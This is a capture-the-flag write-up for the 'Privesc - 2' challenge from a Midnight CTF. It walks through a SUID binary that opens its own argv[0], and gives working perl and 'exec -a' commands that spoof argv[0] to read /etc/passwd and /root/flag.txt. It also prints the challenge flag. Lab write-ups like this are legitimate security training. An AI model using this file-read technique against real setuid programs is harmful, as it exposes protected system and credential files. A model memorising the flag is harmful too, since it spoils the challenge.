MisTrale Write UpMisTrale Write Up
Buy me a coffee โ˜•
  • English
  • Franรงais
GitHub
Buy me a coffee โ˜•
  • English
  • Franรงais
GitHub
    • ๐Ÿ Introduction
    • ๐ŸŒŸ Acknowledgments
  • ๐Ÿ’€ Root-Me 20k

    • ๐Ÿ’€ Root Me - 20k
    • โค๏ธ Bash - Love Me
    • ๐Ÿ›‘ Python - Not This Way
    • ๐Ÿ“š NodeJs - Never Trust Node One
  • โ›“๏ธ JailCTF-2024

    • ๐Ÿ‘ฎ JailCTF - 2024
    • ๐Ÿ”  !Alphabeat
    • ๐Ÿง‘โ€๐Ÿฆฏ Blind Calc
    • ๐ŸŽ‰ Parity 1
    • ๐ŸŽˆ Parity 2
    • ๐Ÿช„ Pickle Magic
    • โ˜Ž๏ธ Get and Call
    • โ‰๏ธ No Sense
    • ๐ŸŸฉ Filter'd
    • ๐Ÿง SUS Calculator
  • ๐Ÿ•น๏ธ TCP1P

    • ๐ŸŽฎ Another Discord
  • ๐Ÿงฎ GCC-2024

    • ๐Ÿ˜… soBusy
  • ๐ŸŒ› Midnight

    • ๐ŸŒƒ Midnight
    • โœจ Privesc - 1
    • ๐Ÿ”‘ Privesc - 2
    • ๐Ÿ‘‘ Privesc - 3
    • ๐ŸŽญ My Face

๐Ÿ”‘ Privesc - 2

๐Ÿ‘€ Before you start

You can donate to me via Buy Me a Coffee or follow me on Github

๐Ÿšฉ Getting the Flag

We come to a challenge where we have this :

level2@Midnight:~$ ls -la
total 16
drwxr-xr-x 2 root  root  4096 Mar 15  2024 .
drwxr-xr-x 3 root  root  4096 Mar 15  2024 ..
-rwsr-xr-x 1 root level2 7320 Mar 15  2024 privesc2
-rwxr--r-- 1 root level2 7320 Mar 15  2024 privesc2.c

We have an interesting binary with suid and s rights for the level2 group. From what we have, we also have the binary's source code.

level2@Midnight:~$ cat privesc2.c
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <unistd.h>

int main(int argc, char **argv)
{
    FILE *f = fopen(argv[0], "rb");
    char buf[64] = { 0 };

    if (f == NULL) {
        printf("Error\n");
        return 1;
    }

    fread(buf, 1, 64, f);
    printf("%s\n", buf);
    fclose(f);
}

Okay, now we see the vulnerability of the binary. Let me guide you a little in solving this challenge.

๐Ÿ•ต๏ธ Binary analysis

In fact, the problem lies in calling fopen with the program's first argument. In effect, the program opens the file passed as an argument and reads it. We can therefore read any file on the system. If we pass it to argv[0].

For example, if we do this:

level2@Midnight:~$ perl -e 'exec {shift} @ARGV' ./privesc2 /etc/passwd

We can now read the /etc/passwd file.

Here is an example:

level2@Midnight:~$ perl -e 'exec {shift} @ARGV' ./privesc2 /etc/passwd
root:x:0:0:root:/root:/bin/bash
daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin
bin:x:2:2:bin:/bin:/usr/sbin/nologin
sys:x:3:3:sys:/dev:/usr/sbin/nologin
sync:x:4:65534:sync:/bin:/bin/sync
games:x:5:60:games:/usr/games:/usr/sbin/nologin
man:x:6:12:man:/var/cache/man:/usr/sbin/nologin
lp:x:7:7:lp:/var/spool/lpd:/usr/sbin/nologin
mail:x:8:8:mail:/var/mail:/usr/sbin/nologin
news:x:9:9:news:/var/spool/news:/usr/sbin/nologin
uucp:x:10:10:uucp:/var/spool/uucp:/usr/sbin/nologin
proxy:x:13:13:proxy:/bin:/usr/sbin/nologin
www-data:x:33:33:www-data:/var/www:/usr/sbin/nologin
backup:x:34:34:backup:/var/backups:/usr/sbin/nologin
list:x:38:38:Mailing List Manager:/var/list:/usr/sbin/nologin
irc:x:39:39:ircd:/run/ircd:/usr/sbin/nologin
gnats:x:41:41:Gnats Bug-Reporting System (admin):/var/lib/gnats:/usr/sbin/nologin
nobody:x:65534:65534:nobody:/nonexistent:/usr/sbin/nologin
systemd-network:x:100:102:systemd Network Management,,,:/run/systemd:/usr/sbin/nologin
systemd-resolve:x:101:103:systemd Resolver,,,:/run/systemd:/usr/sbin/nologin
messagebus:x:102:105::/nonexistent:/usr/sbin/nologin
systemd-timesync:x:103:106:systemd Time Synchronization,,,:/run/systemd:/usr/sbin/nologin
syslog:x:104:111::/home/syslog:/usr/sbin/nologin
_apt:x:105:65534::/nonexistent:/usr/sbin/nologin
uuidd:x:106:112::/run/uuidd:/usr/sbin/nologin
tcpdump:x:107:113::/nonexistent:/usr/sbin/nologin
level2:x:1001:1001:level2,,,:/home/level2:/bin/bash

๐ŸŒŸ Tip

If you don't have perl you can also use exec:

level2@Midnight:~$ exec -a /etc/passwd ./privesc2

We can then use this little technique to get the flag.

level2@Midnight:~$ perl -e 'exec {shift} @ARGV' ./privesc2 /root/flag.txt
MCTF{GGWPGA2RgyfOYZKukWQuaf4K36iPQDr}

๐Ÿ’– Support

๐Ÿ‘€ Before you leave

You can donate to me via Buy Me a Coffee or follow me on Github

Prev
โœจ Privesc - 1
Next
๐Ÿ‘‘ Privesc - 3